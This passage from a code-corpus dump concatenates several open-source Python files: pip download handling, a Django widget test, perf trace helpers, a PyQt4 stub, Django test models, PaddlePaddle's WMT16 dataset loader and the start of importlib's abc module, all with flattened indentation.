except HashMismatch:
logger.warn(
'Cached file %s has bad hash, '
're-downloading.' % temp_location
)
temp_location = None
os.unlink(cache_file)
os.unlink(cache_content_type_file)
already_cached = False
# We don't have either a cached or a downloaded copy
# let's download to a tmp dir
if not temp_location:
try:
resp = session.get(target_url, stream=True)
resp.raise_for_status()
except requests.HTTPError as exc:
logger.fatal("HTTP error %s while getting %s" %
(exc.response.status_code, link))
raise
content_type = resp.headers.get('content-type', '')
filename = link.filename # fallback
# Have a look at the Content-Disposition header for a better guess
content_disposition = resp.headers.get('content-disposition')
if content_disposition:
type, params = cgi.parse_header(content_disposition)
# We use ``or`` here because we don't want to use an "empty" value
# from the filename param.
filename = params.get('filename') or filename
ext = splitext(filename)[1]
if not ext:
ext = mimetypes.guess_extension(content_type)
if ext:
filename += ext
if not ext and link.url != resp.url:
ext = os.path.splitext(resp.url)[1]
if ext:
filename += ext
temp_location = os.path.join(temp_dir, filename)
download_hash = _download_url(resp, link, temp_location)
if link.hash and link.hash_name:
_check_hash(download_hash, link)
# a download dir is specified; let's copy the archive there
if download_dir and not already_downloaded:
_copy_file(temp_location, download_dir, content_type, link)
# unpack the archive to the build dir location. even when only downloading
# archives, they have to be unpacked to parse dependencies
unpack_file(temp_location, location, content_type, link)
# if using a download cache, cache it, if needed
if cache_file and not already_cached:
cache_download(cache_file, temp_location, content_type)
if not (already_cached or already_downloaded):
os.unlink(temp_location)
os.rmdir(temp_dir)
def unpack_file_url(link, location, download_dir=None):
link_path = url_to_path(link.url_without_fragment)
already_downloaded = False
# If it's a url to a local directory
if os.path.isdir(link_path):
if os.path.isdir(location):
rmtree(location)
shutil.copytree(link_path, location, symlinks=True)
return
# if link has a hash, let's confirm it matches
if link.hash:
link_path_hash = _get_hash_from_file(link_path, link)
_check_hash(link_path_hash, link)
# If a download dir is specified, is the file already there and valid?
if download_dir:
download_path = os.path.join(download_dir, link.filename)
if os.path.exists(download_path):
content_type = mimetypes.guess_type(download_path)[0]
logger.notify('File was already downloaded %s' % download_path)
if link.hash:
download_hash = _get_hash_from_file(download_path, link)
try:
_check_hash(download_hash, link)
already_downloaded = True
except HashMismatch:
logger.warn(
'Previously-downloaded file %s has bad hash, '
're-downloading.' % link_path
)
os.unlink(download_path)
else:
already_downloaded = True
if already_downloaded:
from_path = download_path
else:
from_path = link_path
content_type = mimetypes.guess_type(from_path)[0]
# unpack the archive to the build dir location. even when only downloading
# archives, they have to be unpacked to parse dependencies
unpack_file(from_path, location, content_type, link)
# a download dir is specified and not already downloaded
if download_dir and not already_downloaded:
_copy_file(from_path, download_dir, content_type, link)
| gpl-2.0 |
sjlehtin/django | tests/forms_tests/widget_tests/test_selectmultiple.py | 38 | 5366 | from django.forms import SelectMultiple
from .base import WidgetTest
class SelectMultipleTest(WidgetTest):
widget = SelectMultiple
numeric_choices = (('0', '0'), ('1', '1'), ('2', '2'), ('3', '3'), ('0', 'extra'))
def test_format_value(self):
widget = self.widget(choices=self.numeric_choices)
self.assertEqual(widget.format_value(None), [''])
self.assertEqual(widget.format_value(''), [''])
self.assertEqual(widget.format_value([3, 0, 1]), ['3', '0', '1'])
def test_render_selected(self):
self.check_html(self.widget(choices=self.beatles), 'beatles', ['J'], html=(
"""<select multiple="multiple" name="beatles">
<option value="J" selected>John</option>
<option value="P">Paul</option>
<option value="G">George</option>
<option value="R">Ringo</option>
</select>"""
))
def test_render_multiple_selected(self):
self.check_html(self.widget(choices=self.beatles), 'beatles', ['J', 'P'], html=(
"""<select multiple="multiple" name="beatles">
<option value="J" selected>John</option>
<option value="P" selected>Paul</option>
<option value="G">George</option>
<option value="R">Ringo</option>
</select>"""
))
def test_render_none(self):
"""
If the value is None, none of the options are selected.
"""
self.check_html(self.widget(choices=self.beatles), 'beatles', None, html=(
"""<select multiple="multiple" name="beatles">
<option value="J">John</option>
<option value="P">Paul</option>
<option value="G">George</option>
<option value="R">Ringo</option>
</select>"""
))
def test_render_value_label(self):
"""
If the value corresponds to a label (but not to an option value), none
of the options are selected.
"""
self.check_html(self.widget(choices=self.beatles), 'beatles', ['John'], html=(
"""<select multiple="multiple" name="beatles">
<option value="J">John</option>
<option value="P">Paul</option>
<option value="G">George</option>
<option value="R">Ringo</option>
</select>"""
))
def test_multiple_options_same_value(self):
"""
Multiple options with the same value can be selected (#8103).
"""
self.check_html(self.widget(choices=self.numeric_choices), 'choices', ['0'], html=(
"""<select multiple="multiple" name="choices">
<option value="0" selected>0</option>
<option value="1">1</option>
<option value="2">2</option>
<option value="3">3</option>
<option value="0" selected>extra</option>
</select>"""
))
def test_multiple_values_invalid(self):
"""
If multiple values are given, but some of them are not valid, the valid
ones are selected.
"""
self.check_html(self.widget(choices=self.beatles), 'beatles', ['J', 'G', 'foo'], html=(
"""<select multiple="multiple" name="beatles">
<option value="J" selected>John</option>
<option value="P">Paul</option>
<option value="G" selected>George</option>
<option value="R">Ringo</option>
</select>"""
))
def test_compare_string(self):
choices = [('1', '1'), ('2', '2'), ('3', '3')]
self.check_html(self.widget(choices=choices), 'nums', [2], html=(
"""<select multiple="multiple" name="nums">
<option value="1">1</option>
<option value="2" selected>2</option>
<option value="3">3</option>
</select>"""
))
self.check_html(self.widget(choices=choices), 'nums', ['2'], html=(
"""<select multiple="multiple" name="nums">
<option value="1">1</option>
<option value="2" selected>2</option>
<option value="3">3</option>
</select>"""
))
self.check_html(self.widget(choices=choices), 'nums', [2], html=(
"""<select multiple="multiple" name="nums">
<option value="1">1</option>
<option value="2" selected>2</option>
<option value="3">3</option>
</select>"""
))
def test_optgroup_select_multiple(self):
widget = SelectMultiple(choices=(
('outer1', 'Outer 1'),
('Group "1"', (('inner1', 'Inner 1'), ('inner2', 'Inner 2'))),
))
self.check_html(widget, 'nestchoice', ['outer1', 'inner2'], html=(
"""<select multiple="multiple" name="nestchoice">
<option value="outer1" selected>Outer 1</option>
<optgroup label="Group "1"">
<option value="inner1">Inner 1</option>
<option value="inner2" selected>Inner 2</option>
</optgroup>
</select>"""
))
def test_value_omitted_from_data(self):
widget = self.widget(choices=self.beatles)
self.assertIs(widget.value_omitted_from_data({}, {}, 'field'), False)
self.assertIs(widget.value_omitted_from_data({'field': 'value'}, {}, 'field'), False)
| bsd-3-clause |
cm-a7lte/device_samsung_a7lte | tools/perf/scripts/python/Perf-Trace-Util/lib/Perf/Trace/Core.py | 11088 | 3246 | # Core.py - Python extension for perf script, core functions
#
# Copyright (C) 2010 by Tom Zanussi <tzanussi@gmail.com>
#
# This software may be distributed under the terms of the GNU General
# Public License ("GPL") version 2 as published by the Free Software
# Foundation.
from collections import defaultdict
def autodict():
return defaultdict(autodict)
flag_fields = autodict()
symbolic_fields = autodict()
def define_flag_field(event_name, field_name, delim):
flag_fields[event_name][field_name]['delim'] = delim
def define_flag_value(event_name, field_name, value, field_str):
flag_fields[event_name][field_name]['values'][value] = field_str
def define_symbolic_field(event_name, field_name):
# nothing to do, really
pass
def define_symbolic_value(event_name, field_name, value, field_str):
symbolic_fields[event_name][field_name]['values'][value] = field_str
def flag_str(event_name, field_name, value):
string = ""
if flag_fields[event_name][field_name]:
print_delim = 0
keys = flag_fields[event_name][field_name]['values'].keys()
keys.sort()
for idx in keys:
if not value and not idx:
string += flag_fields[event_name][field_name]['values'][idx]
break
if idx and (value & idx) == idx:
if print_delim and flag_fields[event_name][field_name]['delim']:
string += " " + flag_fields[event_name][field_name]['delim'] + " "
string += flag_fields[event_name][field_name]['values'][idx]
print_delim = 1
value &= ~idx
return string
def symbol_str(event_name, field_name, value):
string = ""
if symbolic_fields[event_name][field_name]:
keys = symbolic_fields[event_name][field_name]['values'].keys()
keys.sort()
for idx in keys:
if not value and not idx:
string = symbolic_fields[event_name][field_name]['values'][idx]
break
if (value == idx):
string = symbolic_fields[event_name][field_name]['values'][idx]
break
return string
trace_flags = { 0x00: "NONE", \
0x01: "IRQS_OFF", \
0x02: "IRQS_NOSUPPORT", \
0x04: "NEED_RESCHED", \
0x08: "HARDIRQ", \
0x10: "SOFTIRQ" }
def trace_flag_str(value):
string = ""
print_delim = 0
keys = trace_flags.keys()
for idx in keys:
if not value and not idx:
string += "NONE"
break
if idx and (value & idx) == idx:
if print_delim:
string += " | ";
string += trace_flags[idx]
print_delim = 1
value &= ~idx
return string
def taskState(state):
states = {
0 : "R",
1 : "S",
2 : "D",
64: "DEAD"
}
if state not in states:
return "Unknown"
return states[state]
class EventHeaders:
def __init__(self, common_cpu, common_secs, common_nsecs,
common_pid, common_comm):
self.cpu = common_cpu
self.secs = common_secs
self.nsecs = common_nsecs
self.pid = common_pid
self.comm = common_comm
def ts(self):
return (self.secs * (10 ** 9)) + self.nsecs
def ts_format(self):
return "%d.%d" % (self.secs, int(self.nsecs / 1000))
| gpl-2.0 |
ProfessorX/Config | .PyCharm30/system/python_stubs/-1247972723/PyQt4/QtGui/QToolBar.py | 2 | 6912 | # encoding: utf-8
# module PyQt4.QtGui
# from /usr/lib/python2.7/dist-packages/PyQt4/QtGui.so
# by generator 1.135
# no doc
# imports
import PyQt4.QtCore as __PyQt4_QtCore
from QWidget import QWidget
class QToolBar(QWidget):
"""
QToolBar(QString, QWidget parent=None)
QToolBar(QWidget parent=None)
"""
def actionAt(self, *__args): # real signature unknown; restored from __doc__ with multiple overloads
"""
QToolBar.actionAt(QPoint) -> QAction
QToolBar.actionAt(int, int) -> QAction
"""
return QAction
def actionEvent(self, QActionEvent): # real signature unknown; restored from __doc__
""" QToolBar.actionEvent(QActionEvent) """
pass
def actionGeometry(self, QAction): # real signature unknown; restored from __doc__
""" QToolBar.actionGeometry(QAction) -> QRect """
pass
def actionTriggered(self, *args, **kwargs): # real signature unknown
""" QToolBar.actionTriggered[QAction] [signal] """
pass
def addAction(self, *__args): # real signature unknown; restored from __doc__ with multiple overloads
"""
QToolBar.addAction(QAction)
QToolBar.addAction(QString) -> QAction
QToolBar.addAction(QIcon, QString) -> QAction
QToolBar.addAction(QString, QObject, SLOT()) -> QAction
QToolBar.addAction(QString, callable) -> QAction
QToolBar.addAction(QIcon, QString, QObject, SLOT()) -> QAction
QToolBar.addAction(QIcon, QString, callable) -> QAction
"""
return QAction
def addSeparator(self): # real signature unknown; restored from __doc__
""" QToolBar.addSeparator() -> QAction """
return QAction
def addWidget(self, QWidget): # real signature unknown; restored from __doc__
""" QToolBar.addWidget(QWidget) -> QAction """
return QAction
def allowedAreas(self): # real signature unknown; restored from __doc__
""" QToolBar.allowedAreas() -> Qt.ToolBarAreas """
pass
def allowedAreasChanged(self, *args, **kwargs): # real signature unknown
""" QToolBar.allowedAreasChanged[Qt.ToolBarAreas] [signal] """
pass
def changeEvent(self, QEvent): # real signature unknown; restored from __doc__
""" QToolBar.changeEvent(QEvent) """
pass
def childEvent(self, QChildEvent): # real signature unknown; restored from __doc__
""" QToolBar.childEvent(QChildEvent) """
pass
def clear(self): # real signature unknown; restored from __doc__
""" QToolBar.clear() """
pass
def event(self, QEvent): # real signature unknown; restored from __doc__
""" QToolBar.event(QEvent) -> bool """
return False
def iconSize(self): # real signature unknown; restored from __doc__
""" QToolBar.iconSize() -> QSize """
pass
def iconSizeChanged(self, *args, **kwargs): # real signature unknown
""" QToolBar.iconSizeChanged[QSize] [signal] """
pass
def initStyleOption(self, QStyleOptionToolBar): # real signature unknown; restored from __doc__
""" QToolBar.initStyleOption(QStyleOptionToolBar) """
pass
def insertSeparator(self, QAction): # real signature unknown; restored from __doc__
""" QToolBar.insertSeparator(QAction) -> QAction """
return QAction
def insertWidget(self, QAction, QWidget): # real signature unknown; restored from __doc__
""" QToolBar.insertWidget(QAction, QWidget) -> QAction """
return QAction
def isAreaAllowed(self, Qt_ToolBarArea): # real signature unknown; restored from __doc__
""" QToolBar.isAreaAllowed(Qt.ToolBarArea) -> bool """
return False
def isFloatable(self): # real signature unknown; restored from __doc__
""" QToolBar.isFloatable() -> bool """
return False
def isFloating(self): # real signature unknown; restored from __doc__
""" QToolBar.isFloating() -> bool """
return False
def isMovable(self): # real signature unknown; restored from __doc__
""" QToolBar.isMovable() -> bool """
return False
def movableChanged(self, *args, **kwargs): # real signature unknown
""" QToolBar.movableChanged[bool] [signal] """
pass
def orientation(self): # real signature unknown; restored from __doc__
""" QToolBar.orientation() -> Qt.Orientation """
pass
def orientationChanged(self, *args, **kwargs): # real signature unknown
""" QToolBar.orientationChanged[Qt.Orientation] [signal] """
pass
def paintEvent(self, QPaintEvent): # real signature unknown; restored from __doc__
""" QToolBar.paintEvent(QPaintEvent) """
pass
def resizeEvent(self, QResizeEvent): # real signature unknown; restored from __doc__
""" QToolBar.resizeEvent(QResizeEvent) """
pass
def setAllowedAreas(self, Qt_ToolBarAreas): # real signature unknown; restored from __doc__
""" QToolBar.setAllowedAreas(Qt.ToolBarAreas) """
pass
def setFloatable(self, bool): # real signature unknown; restored from __doc__
""" QToolBar.setFloatable(bool) """
pass
def setIconSize(self, QSize): # real signature unknown; restored from __doc__
""" QToolBar.setIconSize(QSize) """
pass
def setMovable(self, bool): # real signature unknown; restored from __doc__
""" QToolBar.setMovable(bool) """
pass
def setOrientation(self, Qt_Orientation): # real signature unknown; restored from __doc__
""" QToolBar.setOrientation(Qt.Orientation) """
pass
def setToolButtonStyle(self, Qt_ToolButtonStyle): # real signature unknown; restored from __doc__
""" QToolBar.setToolButtonStyle(Qt.ToolButtonStyle) """
pass
def toggleViewAction(self): # real signature unknown; restored from __doc__
""" QToolBar.toggleViewAction() -> QAction """
return QAction
def toolButtonStyle(self): # real signature unknown; restored from __doc__
""" QToolBar.toolButtonStyle() -> Qt.ToolButtonStyle """
pass
def toolButtonStyleChanged(self, *args, **kwargs): # real signature unknown
""" QToolBar.toolButtonStyleChanged[Qt.ToolButtonStyle] [signal] """
pass
def topLevelChanged(self, *args, **kwargs): # real signature unknown
""" QToolBar.topLevelChanged[bool] [signal] """
pass
def visibilityChanged(self, *args, **kwargs): # real signature unknown
""" QToolBar.visibilityChanged[bool] [signal] """
pass
def widgetForAction(self, QAction): # real signature unknown; restored from __doc__
""" QToolBar.widgetForAction(QAction) -> QWidget """
return QWidget
def __init__(self, *__args): # real signature unknown; restored from __doc__ with multiple overloads
pass
| gpl-2.0 |
mewtaylor/django | tests/model_meta/models.py | 192 | 5039 | from django.contrib.contenttypes.fields import (
GenericForeignKey, GenericRelation,
)
from django.contrib.contenttypes.models import ContentType
from django.db import models
class Relation(models.Model):
pass
class AbstractPerson(models.Model):
# DATA fields
data_abstract = models.CharField(max_length=10)
fk_abstract = models.ForeignKey(Relation, models.CASCADE, related_name='fk_abstract_rel')
# M2M fields
m2m_abstract = models.ManyToManyField(Relation, related_name='m2m_abstract_rel')
friends_abstract = models.ManyToManyField('self', related_name='friends_abstract', symmetrical=True)
following_abstract = models.ManyToManyField('self', related_name='followers_abstract', symmetrical=False)
# VIRTUAL fields
data_not_concrete_abstract = models.ForeignObject(
Relation,
on_delete=models.CASCADE,
from_fields=['abstract_non_concrete_id'],
to_fields=['id'],
related_name='fo_abstract_rel',
)
# GFK fields
content_type_abstract = models.ForeignKey(ContentType, models.CASCADE, related_name='+')
object_id_abstract = models.PositiveIntegerField()
content_object_abstract = GenericForeignKey('content_type_abstract', 'object_id_abstract')
# GR fields
generic_relation_abstract = GenericRelation(Relation)
class Meta:
abstract = True
class BasePerson(AbstractPerson):
# DATA fields
data_base = models.CharField(max_length=10)
fk_base = models.ForeignKey(Relation, models.CASCADE, related_name='fk_base_rel')
# M2M fields
m2m_base = models.ManyToManyField(Relation, related_name='m2m_base_rel')
friends_base = models.ManyToManyField('self', related_name='friends_base', symmetrical=True)
following_base = models.ManyToManyField('self', related_name='followers_base', symmetrical=False)
# VIRTUAL fields
data_not_concrete_base = models.ForeignObject(
Relation,
on_delete=models.CASCADE,
from_fields=['base_non_concrete_id'],
to_fields=['id'],
related_name='fo_base_rel',
)
# GFK fields
content_type_base = models.ForeignKey(ContentType, models.CASCADE, related_name='+')
object_id_base = models.PositiveIntegerField()
content_object_base = GenericForeignKey('content_type_base', 'object_id_base')
# GR fields
generic_relation_base = GenericRelation(Relation)
class Person(BasePerson):
# DATA fields
data_inherited = models.CharField(max_length=10)
fk_inherited = models.ForeignKey(Relation, models.CASCADE, related_name='fk_concrete_rel')
# M2M Fields
m2m_inherited = models.ManyToManyField(Relation, related_name='m2m_concrete_rel')
friends_inherited = models.ManyToManyField('self', related_name='friends_concrete', symmetrical=True)
following_inherited = models.ManyToManyField('self', related_name='followers_concrete', symmetrical=False)
# VIRTUAL fields
data_not_concrete_inherited = models.ForeignObject(
Relation,
on_delete=models.CASCADE,
from_fields=['model_non_concrete_id'],
to_fields=['id'],
related_name='fo_concrete_rel',
)
# GFK fields
content_type_concrete = models.ForeignKey(ContentType, models.CASCADE, related_name='+')
object_id_concrete = models.PositiveIntegerField()
content_object_concrete = GenericForeignKey('content_type_concrete', 'object_id_concrete')
# GR fields
generic_relation_concrete = GenericRelation(Relation)
class ProxyPerson(Person):
class Meta:
proxy = True
class Relating(models.Model):
# ForeignKey to BasePerson
baseperson = models.ForeignKey(BasePerson, models.CASCADE, related_name='relating_baseperson')
baseperson_hidden = models.ForeignKey(BasePerson, models.CASCADE, related_name='+')
# ForeignKey to Person
person = models.ForeignKey(Person, models.CASCADE, related_name='relating_person')
person_hidden = models.ForeignKey(Person, models.CASCADE, related_name='+')
# ForeignKey to ProxyPerson
proxyperson = models.ForeignKey(ProxyPerson, models.CASCADE, related_name='relating_proxyperson')
proxyperson_hidden = models.ForeignKey(ProxyPerson, models.CASCADE, related_name='+')
# ManyToManyField to BasePerson
basepeople = models.ManyToManyField(BasePerson, related_name='relating_basepeople')
basepeople_hidden = models.ManyToManyField(BasePerson, related_name='+')
# ManyToManyField to Person
people = models.ManyToManyField(Person, related_name='relating_people')
people_hidden = models.ManyToManyField(Person, related_name='+')
# ParentListTests models
class CommonAncestor(models.Model):
pass
class FirstParent(CommonAncestor):
first_ancestor = models.OneToOneField(CommonAncestor, models.SET_NULL, primary_key=True, parent_link=True)
class SecondParent(CommonAncestor):
second_ancestor = models.OneToOneField(CommonAncestor, models.SET_NULL, primary_key=True, parent_link=True)
class Child(FirstParent, SecondParent):
pass
| bsd-3-clause |
PaddlePaddle/Paddle | python/paddle/dataset/wmt16.py | 1 | 13611 | # Copyright (c) 2016 PaddlePaddle Authors. All Rights Reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
ACL2016 Multimodal Machine Translation. Please see this website for more
details: http://www.statmt.org/wmt16/multimodal-task.html#task1
If you use the dataset created for your task, please cite the following paper:
Multi30K: Multilingual English-German Image Descriptions.
@article{elliott-EtAl:2016:VL16,
author = {{Elliott}, D. and {Frank}, S. and {Sima"an}, K. and {Specia}, L.},
title = {Multi30K: Multilingual English-German Image Descriptions},
booktitle = {Proceedings of the 6th Workshop on Vision and Language},
year = {2016},
pages = {70--74},
year = 2016
}
"""
from __future__ import print_function
import os
import six
import tarfile
import gzip
from collections import defaultdict
import paddle
import paddle.compat as cpt
import paddle.utils.deprecated as deprecated
__all__ = []
DATA_URL = ("http://paddlemodels.bj.bcebos.com/wmt/wmt16.tar.gz")
DATA_MD5 = "0c38be43600334966403524a40dcd81e"
TOTAL_EN_WORDS = 11250
TOTAL_DE_WORDS = 19220
START_MARK = "<s>"
END_MARK = "<e>"
UNK_MARK = "<unk>"
def __build_dict(tar_file, dict_size, save_path, lang):
word_dict = defaultdict(int)
with tarfile.open(tar_file, mode="r") as f:
for line in f.extractfile("wmt16/train"):
line = cpt.to_text(line)
line_split = line.strip().split("\t")
if len(line_split) != 2: continue
sen = line_split[0] if lang == "en" else line_split[1]
for w in sen.split():
word_dict[w] += 1
with open(save_path, "wb") as fout:
fout.write(
cpt.to_bytes("%s\n%s\n%s\n" % (START_MARK, END_MARK, UNK_MARK)))
for idx, word in enumerate(
sorted(
six.iteritems(word_dict), key=lambda x: x[1],
reverse=True)):
if idx + 3 == dict_size: break
fout.write(cpt.to_bytes(word[0]))
fout.write(cpt.to_bytes('\n'))
def __load_dict(tar_file, dict_size, lang, reverse=False):
dict_path = os.path.join(paddle.dataset.common.DATA_HOME,
"wmt16/%s_%d.dict" % (lang, dict_size))
if not os.path.exists(dict_path) or (
len(open(dict_path, "rb").readlines()) != dict_size):
__build_dict(tar_file, dict_size, dict_path, lang)
word_dict = {}
with open(dict_path, "rb") as fdict:
for idx, line in enumerate(fdict):
if reverse:
word_dict[idx] = cpt.to_text(line.strip())
else:
word_dict[cpt.to_text(line.strip())] = idx
return word_dict
def __get_dict_size(src_dict_size, trg_dict_size, src_lang):
src_dict_size = min(src_dict_size, (TOTAL_EN_WORDS if src_lang == "en" else
TOTAL_DE_WORDS))
trg_dict_size = min(trg_dict_size, (TOTAL_DE_WORDS if src_lang == "en" else
TOTAL_EN_WORDS))
return src_dict_size, trg_dict_size
def reader_creator(tar_file, file_name, src_dict_size, trg_dict_size, src_lang):
def reader():
src_dict = __load_dict(tar_file, src_dict_size, src_lang)
trg_dict = __load_dict(tar_file, trg_dict_size,
("de" if src_lang == "en" else "en"))
# the index for start mark, end mark, and unk are the same in source
# language and target language. Here uses the source language
# dictionary to determine their indices.
start_id = src_dict[START_MARK]
end_id = src_dict[END_MARK]
unk_id = src_dict[UNK_MARK]
src_col = 0 if src_lang == "en" else 1
trg_col = 1 - src_col
with tarfile.open(tar_file, mode="r") as f:
for line in f.extractfile(file_name):
line = cpt.to_text(line)
line_split = line.strip().split("\t")
if len(line_split) != 2:
continue
src_words = line_split[src_col].split()
src_ids = [start_id] + [
src_dict.get(w, unk_id) for w in src_words
] + [end_id]
trg_words = line_split[trg_col].split()
trg_ids = [trg_dict.get(w, unk_id) for w in trg_words]
trg_ids_next = trg_ids + [end_id]
trg_ids = [start_id] + trg_ids
yield src_ids, trg_ids, trg_ids_next
return reader
@deprecated(
since="2.0.0",
update_to="paddle.text.datasets.WMT16",
level=1,
reason="Please use new dataset API which supports paddle.io.DataLoader")
def train(src_dict_size, trg_dict_size, src_lang="en"):
"""
WMT16 train set reader.
This function returns the reader for train data. Each sample the reader
returns is made up of three fields: the source language word index sequence,
target language word index sequence and next word index sequence.
NOTE:
The original like for training data is:
http://www.quest.dcs.shef.ac.uk/wmt16_files_mmt/training.tar.gz
paddle.dataset.wmt16 provides a tokenized version of the original dataset by
using moses's tokenization script:
https://github.com/moses-smt/mosesdecoder/blob/master/scripts/tokenizer/tokenizer.perl
Args:
src_dict_size(int): Size of the source language dictionary. Three
special tokens will be added into the dictionary:
<s> for start mark, <e> for end mark, and <unk> for
unknown word.
trg_dict_size(int): Size of the target language dictionary. Three
special tokens will be added into the dictionary:
<s> for start mark, <e> for end mark, and <unk> for
unknown word.
src_lang(string): A string indicating which language is the source
language. Available options are: "en" for English
and "de" for Germany.
Returns:
callable: The train reader.
"""
if src_lang not in ["en", "de"]:
raise ValueError("An error language type. Only support: "
"en (for English); de(for Germany).")
src_dict_size, trg_dict_size = __get_dict_size(src_dict_size, trg_dict_size,
src_lang)
return reader_creator(
tar_file=paddle.dataset.common.download(DATA_URL, "wmt16", DATA_MD5,
"wmt16.tar.gz"),
file_name="wmt16/train",
src_dict_size=src_dict_size,
trg_dict_size=trg_dict_size,
src_lang=src_lang)
@deprecated(
since="2.0.0",
update_to="paddle.text.datasets.WMT16",
level=1,
reason="Please use new dataset API which supports paddle.io.DataLoader")
def test(src_dict_size, trg_dict_size, src_lang="en"):
"""
WMT16 test set reader.
This function returns the reader for test data. Each sample the reader
returns is made up of three fields: the source language word index sequence,
target language word index sequence and next word index sequence.
NOTE:
The original like for test data is:
http://www.quest.dcs.shef.ac.uk/wmt16_files_mmt/mmt16_task1_test.tar.gz
paddle.dataset.wmt16 provides a tokenized version of the original dataset by
using moses's tokenization script:
https://github.com/moses-smt/mosesdecoder/blob/master/scripts/tokenizer/tokenizer.perl
Args:
src_dict_size(int): Size of the source language dictionary. Three
special tokens will be added into the dictionary:
<s> for start mark, <e> for end mark, and <unk> for
unknown word.
trg_dict_size(int): Size of the target language dictionary. Three
special tokens will be added into the dictionary:
<s> for start mark, <e> for end mark, and <unk> for
unknown word.
src_lang(string): A string indicating which language is the source
language. Available options are: "en" for English
and "de" for Germany.
Returns:
callable: The test reader.
"""
if src_lang not in ["en", "de"]:
raise ValueError("An error language type. "
"Only support: en (for English); de(for Germany).")
src_dict_size, trg_dict_size = __get_dict_size(src_dict_size, trg_dict_size,
src_lang)
return reader_creator(
tar_file=paddle.dataset.common.download(DATA_URL, "wmt16", DATA_MD5,
"wmt16.tar.gz"),
file_name="wmt16/test",
src_dict_size=src_dict_size,
trg_dict_size=trg_dict_size,
src_lang=src_lang)
@deprecated(
since="2.0.0",
update_to="paddle.text.datasets.WMT16",
level=1,
reason="Please use new dataset API which supports paddle.io.DataLoader")
def validation(src_dict_size, trg_dict_size, src_lang="en"):
"""
WMT16 validation set reader.
This function returns the reader for validation data. Each sample the reader
returns is made up of three fields: the source language word index sequence,
target language word index sequence and next word index sequence.
NOTE:
The original like for validation data is:
http://www.quest.dcs.shef.ac.uk/wmt16_files_mmt/validation.tar.gz
paddle.dataset.wmt16 provides a tokenized version of the original dataset by
using moses's tokenization script:
https://github.com/moses-smt/mosesdecoder/blob/master/scripts/tokenizer/tokenizer.perl
Args:
src_dict_size(int): Size of the source language dictionary. Three
special tokens will be added into the dictionary:
<s> for start mark, <e> for end mark, and <unk> for
unknown word.
trg_dict_size(int): Size of the target language dictionary. Three
special tokens will be added into the dictionary:
<s> for start mark, <e> for end mark, and <unk> for
unknown word.
src_lang(string): A string indicating which language is the source
language. Available options are: "en" for English
and "de" for Germany.
Returns:
callable: The validation reader.
"""
if src_lang not in ["en", "de"]:
raise ValueError("An error language type. "
"Only support: en (for English); de(for Germany).")
src_dict_size, trg_dict_size = __get_dict_size(src_dict_size, trg_dict_size,
src_lang)
return reader_creator(
tar_file=paddle.dataset.common.download(DATA_URL, "wmt16", DATA_MD5,
"wmt16.tar.gz"),
file_name="wmt16/val",
src_dict_size=src_dict_size,
trg_dict_size=trg_dict_size,
src_lang=src_lang)
@deprecated(
since="2.0.0",
update_to="paddle.text.datasets.WMT16",
level=1,
reason="Please use new dataset API which supports paddle.io.DataLoader")
def get_dict(lang, dict_size, reverse=False):
"""
return the word dictionary for the specified language.
Args:
lang(string): A string indicating which language is the source
language. Available options are: "en" for English
and "de" for Germany.
dict_size(int): Size of the specified language dictionary.
reverse(bool): If reverse is set to False, the returned python
dictionary will use word as key and use index as value.
If reverse is set to True, the returned python
dictionary will use index as key and word as value.
Returns:
dict: The word dictionary for the specific language.
"""
if lang == "en": dict_size = min(dict_size, TOTAL_EN_WORDS)
else: dict_size = min(dict_size, TOTAL_DE_WORDS)
dict_path = os.path.join(paddle.dataset.common.DATA_HOME,
"wmt16/%s_%d.dict" % (lang, dict_size))
assert os.path.exists(dict_path), "Word dictionary does not exist. "
"Please invoke paddle.dataset.wmt16.train/test/validation first "
"to build the dictionary."
tar_file = os.path.join(paddle.dataset.common.DATA_HOME, "wmt16.tar.gz")
return __load_dict(tar_file, dict_size, lang, reverse)
@deprecated(
since="2.0.0",
update_to="paddle.text.datasets.WMT16",
level=1,
reason="Please use new dataset API which supports paddle.io.DataLoader")
def fetch():
"""download the entire dataset.
"""
paddle.v4.dataset.common.download(DATA_URL, "wmt16", DATA_MD5,
"wmt16.tar.gz")
| apache-2.0 |
40223105/w16b_test | static/Brython3.1.1-20150328-091302/Lib/importlib/abc.py | 743 | 14595 | """Abstract base classes related to import."""
from . import _bootstrap
from . import machinery
try:
import _frozen_importlib
except ImportError as exc:
if exc.name != '_frozen_importlib':
raise
_frozen_importlib = None
import abc
import imp
import marshal
import sys
import tokenize
import warnings
def _register(abstract_cls, *classes):
for cls in classes:
abstract_cls.register(cls)
if _frozen_importlib is not None:
frozen_cls = getattr(_frozen_importlib, cls.__name__)
abstract_cls.register(frozen_cls)
class Finder(metaclass=abc.ABCMeta):
"""Legacy abstract base class for import finders.
It may be subclassed for compatibility with legacy third party
reimplementations of the import system. Otherwise, finder
implementations should derive from the more specific MetaPathFinder
or PathEntryFinder ABCs.
"""
@abc.abstractmethod
def find_module(self, fullname, path=None):
"""An abstract method that should find a module.
The fullname is a str and the optional path is a str or None.
Returns a Loader object.
"""
raise NotImplementedError
class MetaPathFinder(Finder):
"""Abstract base class for import finders on sys.meta_path."""
@abc.abstractmethod
def find_module(self, fullname, path):
"""Abstract method which, when implemented, should find a module.
The fullname is a str and the path is a str or None.
Returns a Loader object.
"""
raise NotImplementedError
def invalidate_caches(self):
"""An optional method for clearing the finder's cache, if any.
This method is used by importlib.invalidate_caches().
"""
return NotImplemented
_register(MetaPathFinder, machinery.BuiltinImporter, machinery.FrozenImporter,
machinery.PathFinder, machinery.WindowsRegistryFinder)
class PathEntryFinder(Finder):
"""Abstract base class for path entry finders used by PathFinder."""
@abc.abstractmethod
def find_loader(self, fullname):
"""Abstract method which, when implemented, returns a module loader.
The fullname is a str. Returns a 2-tuple of (Loader, portion) where
portion is a sequence of file system locations contributing to part of
a namespace package. The sequence may be empty and the loader may be
None.
"""
raise NotImplementedError
find_module = _bootstrap._find_module_shim
def invalidate_caches(self):
"""An optional method for clearing the finder's cache, if any.
This method is used by PathFinder.invalidate_caches().
"""
return NotImplemented
_register(PathEntryFinder, machinery.FileFinder)
class Loader(metaclass=abc.ABCMeta):
"""Abstract base class for import loaders."""
@abc.abstractmethod
